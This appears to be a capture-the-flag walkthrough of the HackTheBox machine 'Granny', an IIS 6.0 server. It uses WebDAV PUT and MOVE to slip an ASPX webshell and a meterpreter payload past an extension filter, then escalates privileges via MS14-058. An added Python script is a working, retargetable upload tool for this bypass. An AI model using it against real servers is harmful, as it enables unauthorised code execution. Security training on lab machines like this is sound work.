Granny
Reconnaissance:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.15
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Thu, 14 Dec 2023 02:17:01 GMT
|_ WebDAV type: Unknown
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.15
All 1000 scanned ports on 10.10.10.15 are in ignored states.
nmap shows only TCP port 80 open (the UDP scan finds nothing). It's a website, and the webdav-scan output is particularly interesting (I'll come back to that in a minute):
Enumeration: TCP 80
Operating systems: Windows Server
Web frameworks: Microsoft ASP.NET
Web servers: IIS 6.0
The site just says "Under Construction".
Headers: I’ll also check out the response header:
The X-Powered-By: ASP.NET header tells me that .aspx files may execute if I can get them onto the target.
gobuster: I’ll start looking for paths on this server with gobuster, but it doesn’t find anything interesting:
Both /images and /_private are empty dirs.
WebDAV
Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to let people create and modify web sites over HTTP. Work on it started in 1996, when this didn't seem like a terrible idea. I don't see it often on recent HTB machines, but I did come across it in PWK/OSCP. The scan shows that PUT is among the supported methods (note that it appears in the Public Options line but not in the Allowed Methods line for the probed path, a hint that uploads are restricted), which could let me write files onto the web server. Since this is IIS, the server-side file types it executes are ASP and ASPX, so I'll check whether uploads with those extensions are accepted.
Neither .asp nor .aspx uploads are accepted, but .txt and .html are, so the restriction is on the extension, not on PUT itself. PUT isn't the only interesting method, though: MOVE is allowed too. MOVE takes the new location from the Destination header, and because that destination is an arbitrary path, it doubles as a rename, including a change of extension. So the plan is to upload an HTML file and then MOVE it to a name ending in .aspx.
The HTML file uploads correctly. Next, I'll change its extension to .aspx.
Foothold:
Upload Webshell: The first thing I’ll need to do is upload my webshell. Kali has a simple one at /usr/share/webshells/aspx/cmdasp.aspx. I’ll grab a copy:
Now I'll upload that to the target as a .txt using curl and the HTTP PUT method:
If I look at the page now, I’ll see the code, but it’s not executed, as the server is treating it as text:
Move Webshell: Now I'll use the next WebDAV method, MOVE. Again, I can do this with curl:
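The PUT-probe and PUT-then-MOVE steps above, as an added example that is not part of the original writeup. It uses only the Python standard library so it can be pointed at a real target (set BASE_URL to e.g. http://10.10.10.15), and it goes slightly beyond the text by probing a whole list of extensions rather than just .asp/.aspx. To run offline it starts a small mock that reproduces the behaviour observed on the box; the mock, its 201/403 status codes, the BLOCKED_EXTS set and the file names cmd.txt/cmd.aspx are assumptions for the demo, not anything the page shows. The body is sent as raw bytes, which is the equivalent of curl --data-binary @file; curl -d @file strips carriage returns and newlines, which is exactly what breaks a pasted ASPX payload.

```python
"""Added example (not from the original writeup): IIS/WebDAV PUT + MOVE
extension-bypass check. Offline run uses a mock of the observed IIS behaviour."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

PROBE_EXTS = ("txt", "html", "asp", "aspx")   # extensions the writeup tested
BLOCKED_EXTS = {"asp", "aspx"}                # assumption: what the mock refuses


def _request(base_url, method, path, body=None, headers=None):
    """Send one HTTP request and return (status, body_bytes)."""
    u = urlparse(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def webdav_put(base_url, name, data: bytes):
    """PUT raw bytes (like `curl --data-binary @file`, not `curl -d @file`,
    which would strip CR/LF from the payload)."""
    status, _ = _request(base_url, "PUT", "/" + name, body=data,
                         headers={"Content-Length": str(len(data))})
    return status


def webdav_move(base_url, src, dst):
    """WebDAV rename: MOVE /src with the new name in the Destination header."""
    dest = base_url.rstrip("/") + "/" + dst
    status, _ = _request(base_url, "MOVE", "/" + src,
                         headers={"Destination": dest, "Overwrite": "T"})
    return status


def probe_put_extensions(base_url, exts=PROBE_EXTS):
    """Return {ext: status} for a harmless PUT per extension, to see which
    extensions the server lets us write directly."""
    return {e: webdav_put(base_url, f"probe.{e}", b"probe\r\n") for e in exts}


def upload_via_move(base_url, payload: bytes, final_name="cmd.aspx", stage_name="cmd.txt"):
    """Stage under an allowed extension, MOVE to the executable name, fetch it
    back. Returns (put_status, move_status, fetched_bytes)."""
    put_status = webdav_put(base_url, stage_name, payload)
    move_status = webdav_move(base_url, stage_name, final_name)
    _, fetched = _request(base_url, "GET", "/" + final_name)
    return put_status, move_status, fetched


# --- offline mock of the observed IIS 6.0 WebDAV behaviour (assumption) ---
class _MockIIS(BaseHTTPRequestHandler):
    files = {}

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _ext(self, path):
        return path.rsplit(".", 1)[-1].lower() if "." in path else ""

    def do_PUT(self):
        if self._ext(self.path) in BLOCKED_EXTS:      # extension filter on PUT
            self.send_response(403); self.end_headers(); return
        n = int(self.headers.get("Content-Length", 0))
        self.files[self.path] = self.rfile.read(n)
        self.send_response(201); self.end_headers()

    def do_MOVE(self):                                # rename, no extension check
        dst = urlparse(self.headers["Destination"]).path
        if self.path in self.files:
            self.files[dst] = self.files.pop(self.path)
            self.send_response(201)
        else:
            self.send_response(404)
        self.end_headers()

    def do_GET(self):
        data = self.files.get(self.path)
        if data is None:
            self.send_response(404); self.end_headers(); return
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_mock():
    """Start the mock on a free loopback port and return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), _MockIIS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    BASE_URL = start_mock()   # replace with http://10.10.10.15 for the real box
    print(probe_put_extensions(BASE_URL))
    print(upload_via_move(BASE_URL, b'<%@ Page Language="C#" %>\r\n<% Response.Write("ok"); %>\r\n'))
```

Against the real box the probe dictionary is the first thing to read: an extension that returns 403 on PUT but can be reached via MOVE is the whole vulnerability, and the fetched bytes after the MOVE should match the staged payload exactly, which is the check that the upload was not mangled in transit.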
Meterpreter: I’ll do the same thing with a meterpreter payload. Create it:
Start Metasploit:
Trigger it, and it fails:
http://10.10.10.15/shelly.aspx
Why? If I upload shelly.txt again and look at it, the whitespace is all jacked up: curl's -d @file strips carriage returns and newlines from the file before sending it. I'll upload again, this time using --data-binary, which sends the file byte for byte and preserves line endings and other control characters:
On refreshing shelly.txt, it looks much cleaner. Now I'll move the file and trigger it:
Privesc:
Enumeration:
On older boxes like this, I'm more likely to check out local exploits, and Metasploit has a nice module for that, post/multi/recon/local_exploit_suggester:
MS14-058
I’ll pick one (somewhat at random, though I like this one as it says the target appears to be vulnerable):